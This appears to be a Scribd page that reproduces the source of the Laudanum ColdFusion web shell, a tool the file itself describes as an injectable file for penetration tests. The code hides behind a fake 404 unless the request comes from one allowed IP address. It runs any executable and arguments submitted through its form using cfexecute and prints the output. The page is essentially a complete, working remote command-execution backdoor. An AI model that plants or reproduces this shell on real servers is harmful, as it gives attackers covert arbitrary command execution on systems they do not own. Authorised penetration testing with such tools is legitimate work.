Scribd Logo
Carica

Benvenuto in Scribd!

  • CMD

    Caricato da

    Federal Communications Commission (FCC)
    50 visualizzazioni2 pagine
    This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. You can redistribute it and / or modify it under the terms of the GNU General Public License as published by the free software Foundation.

    Descrizione originale:

    Titolo originale

    Cmd

    Copyright

    © © All Rights Reserved

    Formati disponibili

    TXT, PDF, TXT o leggi online da Scribd

    Hai trovato utile questo documento?

    Questo contenuto è inappropriato?

    Segnala questo documento
    This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. You can redistribute it and / or modify it under the terms of the GNU General Public License as published by the free software Foundation.

    Copyright:

    © All Rights Reserved
    Scarica in formato TXT, PDF, TXT o leggi online su Scribd
    Segnala contenuti inappropriati
    50 visualizzazioni2 pagine

    CMD

    Caricato da

    Federal Communications Commission (FCC)
    This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. You can redistribute it and / or modify it under the terms of the GNU General Public License as published by the free software Foundation.

    Copyright:

    © All Rights Reserved
    Scarica in formato TXT, PDF, TXT o leggi online su Scribd
    Segnala contenuti inappropriati
    di 2

    <cfapplication scriptProtect="none">

    <!---
    /* *****************************************************************************
    ***
    *** Laudanum Project
    *** A Collection of Injectable Files used during a Penetration Test
    ***
    *** More information is available at:
    *** http://laudanum.secureideas.net
    *** laudanum@secureideas.net
    ***
    *** Project Leads:
    *** Kevin Johnson <kjohnson@secureideas.net
    *** Tim Medin <tim@securitywhole.com>
    ***
    *** Copyright 2012 by Kevin Johnson and the Laudanum Team
    ***
    ********************************************************************************
    ***
    *** This file provides access to shell acces on the system.
    *** Modified by Tim Medin
    ***
    ********************************************************************************
    ***
    *** TODO: Fix the problem with quotes
    *** Add authentication
    ***
    ********************************************************************************
    *** This program is free software; you can redistribute it and/or
    *** modify it under the terms of the GNU General Public License
    *** as published by the Free Software Foundation; either version 2
    *** of the License, or (at your option) any later version.
    ***
    *** This program is distributed in the hope that it will be useful,
    *** but WITHOUT ANY WARRANTY; without even the implied warranty of
    *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
    *** GNU General Public License for more details.
    ***
    *** You can get a copy of the GNU General Public License from this
    *** address: http://www.gnu.org/copyleft/gpl.html#SEC1^
    *** You can also write to the Free Software Foundation, Inc., 59 Temple
    *** Place - Suite 330, Boston, MA 02111-1307, USA.
    ***
    ***************************************************************************** */
    --->
    <cfif #cgi.remote_addr# neq "1.1.1.1">
    <cfheader statuscode="404" statustext="Page Not Found" />
    <cfabort />
    </cfif>
    <html>
    <head><title>Laudanum Coldfusion Shell</title></head>
    <body>
    <form action="shell.cfm" method="POST">
    <cfif IsDefined("form.cmd")>
    Executable: <Input type="text" name="cmd" value="<cfoutput>#HTMLEditFormat(form.
    cmd)#</cfoutput>"> For Windows use: cmd.exe or the full path to cmd.exe<br>
    Arguments: <Input type="text" name="arguments" value="<cfoutput>#HTMLEditFormat(
    form.arguments)#</cfoutput>"> For Windows use: /c <i>command</i><br>
    <cfelse>
    Executable: <Input type="text" name="cmd" value="cmd.exe"><br>
    Arguments: <Input type="text" name="arguments" value="/c "><br>
    </cfif>
    <input type="submit">
    </form>
    <cfif IsDefined("form.cmd")>
    <pre>
    <cfexecute name="#Replace(preservesinglequotes(form.cmd), QuoteMark, DoubleQuote
    Mark, 'All')#" arguments="#Replace(preservesinglequotes(form.arguments), QuoteMa
    rk, DoubleQuoteMark, 'All')#" timeout="5" variable="foo"></cfexecute>
    <cfoutput>#Replace(foo, "<", "&lt;", "All")#</cfoutput>
    </pre>
    </cfif>
    Note: The cold fusion command that executes shell commands strips quotes, both d
    ouble and single, so be aware.
    <hr/>
    <address>
    Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson
    </a> and the Laudanum team.<br/>
    Written by Tim Medin.<br/>
    Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.s
    ecureideas.net</a>.
    </address>
    </body>
    </html>

    Potrebbero piacerti anche